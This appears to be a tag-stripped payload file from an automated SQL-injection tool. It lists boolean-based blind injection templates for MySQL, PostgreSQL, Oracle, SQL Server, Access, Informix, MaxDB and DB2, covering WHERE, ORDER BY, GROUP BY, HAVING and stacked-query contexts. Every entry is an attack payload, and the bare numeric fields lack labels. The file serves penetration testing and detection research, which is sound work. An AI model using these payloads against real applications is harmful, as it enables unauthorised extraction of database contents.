AND boolean-based blind - WHERE or HAVING clause
1
1
1
1,8,9
1
AND [INFERENCE]
AND [RANDNUM]=[RANDNUM]
AND [RANDNUM]=[RANDNUM1]
OR boolean-based blind - WHERE or HAVING clause
1
1
3
1,9
2
OR [INFERENCE]
OR [RANDNUM]=[RANDNUM]
OR [RANDNUM]=[RANDNUM1]
OR boolean-based blind - WHERE or HAVING clause (NOT)
1
3
3
1,9
1
OR NOT [INFERENCE]
OR NOT [RANDNUM]=[RANDNUM]
OR NOT [RANDNUM]=[RANDNUM1]
AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
1
2
1
1,8,9
1
AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
[GENERIC_SQL_COMMENT]
AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
OR boolean-based blind - WHERE or HAVING clause (subquery - comment)
1
2
3
1,9
2
OR [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
[GENERIC_SQL_COMMENT]
OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
AND boolean-based blind - WHERE or HAVING clause (comment)
1
2
1
1
1
AND [INFERENCE]
AND [RANDNUM]=[RANDNUM]
[GENERIC_SQL_COMMENT]
AND [RANDNUM]=[RANDNUM1]
OR boolean-based blind - WHERE or HAVING clause (comment)
1
2
3
1
2
OR [INFERENCE]
OR [RANDNUM]=[RANDNUM]
[GENERIC_SQL_COMMENT]
OR [RANDNUM]=[RANDNUM1]
OR boolean-based blind - WHERE or HAVING clause (NOT - comment)
1
4
3
1
1
OR NOT [INFERENCE]
OR NOT [RANDNUM]=[RANDNUM]
[GENERIC_SQL_COMMENT]
OR NOT [RANDNUM]=[RANDNUM1]
AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
1
3
1
1
1
AND [INFERENCE]
AND [RANDNUM]=[RANDNUM]
#
AND [RANDNUM]=[RANDNUM1]
MySQL
OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
1
3
3
1
2
OR [INFERENCE]
OR [RANDNUM]=[RANDNUM]
#
OR [RANDNUM]=[RANDNUM1]
MySQL
OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
1
3
3
1
1
OR NOT [INFERENCE]
OR NOT [RANDNUM]=[RANDNUM]
#
OR NOT [RANDNUM]=[RANDNUM1]
MySQL
AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)
1
3
1
1
1
AND [INFERENCE]
AND [RANDNUM]=[RANDNUM]
%16
AND [RANDNUM]=[RANDNUM1]
Microsoft Access
OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)
1
3
3
1
2
OR [INFERENCE]
OR [RANDNUM]=[RANDNUM]
%16
OR [RANDNUM]=[RANDNUM1]
Microsoft Access
MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
1
2
1
1,2,3
1
RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))
RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))
MySQL
MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
1
3
1
1,2,3,8
1
AND MAKE_SET([INFERENCE],[RANDNUM])
AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])
AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])
MySQL
MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
1
3
3
1,2,3
2
OR MAKE_SET([INFERENCE],[RANDNUM])
OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])
OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])
MySQL
MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)
1
4
1
1,2,3,8
1
AND ELT([INFERENCE],[RANDNUM])
AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1])
AND ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])
MySQL
MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)
1
4
3
1,2,3
2
OR ELT([INFERENCE],[RANDNUM])
OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1])
OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])
MySQL
MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)
1
5
1
1,2,3,8
1
AND ([INFERENCE])*[RANDNUM]
AND ([RANDNUM]=[RANDNUM])*[RANDNUM1]
AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1]
MySQL
MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)
1
5
3
1,2,3
2
OR ([INFERENCE])*[RANDNUM]
OR ([RANDNUM]=[RANDNUM])*[RANDNUM1]
OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1]
MySQL
PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
1
2
1
1,8
1
AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL
AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL
AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL
PostgreSQL
PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)
1
3
3
1
2
OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL
OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL
OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL
PostgreSQL
Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
1
2
1
1
1
AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL
AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL
AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL
Oracle
Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
1
3
3
1
2
OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL
OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL
OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL
Oracle
Boolean-based blind - Parameter replace (original value)
1
1
1
1,2,3
3
(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
MySQL boolean-based blind - Parameter replace (MAKE_SET)
1
4
1
1,2,3
3
MAKE_SET([INFERENCE],[RANDNUM])
MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])
MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])
MySQL
MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)
1
5
1
1,2,3
3
MAKE_SET([INFERENCE],[ORIGVALUE])
MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])
MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])
MySQL
MySQL boolean-based blind - Parameter replace (ELT)
1
4
1
1,2,3
3
ELT([INFERENCE],[RANDNUM])
ELT([RANDNUM]=[RANDNUM],[RANDNUM1])
ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])
MySQL
MySQL boolean-based blind - Parameter replace (ELT - original value)
1
5
1
1,2,3
3
ELT([INFERENCE],[ORIGVALUE])
ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])
ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])
MySQL
MySQL boolean-based blind - Parameter replace (bool*int)
1
4
1
1,2,3
3
([INFERENCE])*[RANDNUM]
([RANDNUM]=[RANDNUM])*[RANDNUM1]
([RANDNUM]=[RANDNUM1])*[RANDNUM1]
MySQL
MySQL boolean-based blind - Parameter replace (bool*int - original value)
1
5
1
1,2,3
3
([INFERENCE])*[ORIGVALUE]
([RANDNUM]=[RANDNUM])*[ORIGVALUE]
([RANDNUM]=[RANDNUM1])*[ORIGVALUE]
MySQL
PostgreSQL boolean-based blind - Parameter replace
1
3
1
1,2,3
3
(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))
PostgreSQL
PostgreSQL boolean-based blind - Parameter replace (original value)
1
4
1
1,2,3
3
(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
PostgreSQL
PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)
1
5
1
1,2,3
3
(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)
(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)
(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)
PostgreSQL
PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)
1
5
1
1,2,3
3
(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)
(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)
(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)
PostgreSQL
Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
1
3
1
1,3
3
(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
Microsoft SQL Server
Sybase
Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)
1
4
1
1,3
3
(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
Microsoft SQL Server
Sybase
Oracle boolean-based blind - Parameter replace
1
3
1
1,3
3
(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle
Oracle boolean-based blind - Parameter replace (original value)
1
4
1
1,3
3
(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle
Informix boolean-based blind - Parameter replace
1
3
1
1,3
3
(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)
Informix
Informix boolean-based blind - Parameter replace (original value)
1
4
1
1,3
3
(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)
(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)
Informix
Microsoft Access boolean-based blind - Parameter replace
1
3
1
1,3
3
IIF([INFERENCE],[RANDNUM],1/0)
IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0)
IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0)
Microsoft Access
Microsoft Access boolean-based blind - Parameter replace (original value)
1
4
1
1,3
3
IIF([INFERENCE],[ORIGVALUE],1/0)
IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)
IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)
Microsoft Access
Boolean-based blind - Parameter replace (DUAL)
1
2
1
1,2,3
3
(CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)
(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)
(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)
Boolean-based blind - Parameter replace (DUAL - original value)
1
3
1
1,2,3
3
(CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)
(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)
(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)
Boolean-based blind - Parameter replace (CASE)
1
2
1
1,3
3
(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)
(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)
(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)
Boolean-based blind - Parameter replace (CASE - original value)
1
3
1
1,3
3
(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)
(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)
(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)
MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause
1
2
1
2,3
1
,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
MySQL
>= 5.0
MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)
1
3
1
2,3
1
,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
MySQL
>= 5.0
MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause
1
3
1
2,3
1
,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
MySQL
< 5.0
MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)
1
4
1
2,3
1
,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
MySQL
< 5.0
PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause
1
2
1
2,3
1
,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END))
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))
PostgreSQL
PostgreSQL boolean-based blind - ORDER BY clause (original value)
1
4
1
3
1
,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
PostgreSQL
PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)
1
5
1
3
1
,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)
,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)
,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)
PostgreSQL
Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
1
3
1
3
1
,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
Microsoft SQL Server
Sybase
Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value)
1
4
1
3
1
,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
Microsoft SQL Server
Sybase
Oracle boolean-based blind - ORDER BY, GROUP BY clause
1
3
1
2,3
1
,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle
Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)
1
4
1
2,3
1
,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle
Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause
1
4
1
2,3
1
,IIF([INFERENCE],1,1/0)
,IIF([RANDNUM]=[RANDNUM],1,1/0)
,IIF([RANDNUM]=[RANDNUM1],1,1/0)
Microsoft Access
Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value)
1
5
1
2,3
1
,IIF([INFERENCE],[ORIGVALUE],1/0)
,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)
,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)
Microsoft Access
SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause
1
4
1
2,3
1
,(CASE WHEN [INFERENCE] THEN 1 ELSE NULL END)
,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END)
,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END)
SAP MaxDB
SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)
1
5
1
2,3
1
,(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)
,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)
,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)
SAP MaxDB
IBM DB2 boolean-based blind - ORDER BY clause
1
4
1
3
1
,(SELECT CASE WHEN [INFERENCE] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
IBM DB2
IBM DB2 boolean-based blind - ORDER BY clause (original value)
1
5
1
3
1
,(SELECT CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
IBM DB2
HAVING boolean-based blind - WHERE, GROUP BY clause
1
3
1
1,2
1
HAVING [INFERENCE]
HAVING [RANDNUM]=[RANDNUM]
HAVING [RANDNUM]=[RANDNUM1]
MySQL >= 5.0 boolean-based blind - Stacked queries
1
4
1
1-8
1
;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)
;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)
#
;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)
MySQL
>= 5.0
MySQL < 5.0 boolean-based blind - Stacked queries
1
5
1
1-8
1
;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)
;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)
#
;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)
MySQL
< 5.0
PostgreSQL boolean-based blind - Stacked queries
1
3
1
1-8
1
;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
--
;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
PostgreSQL
PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)
1
5
1
1-8
1
;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1
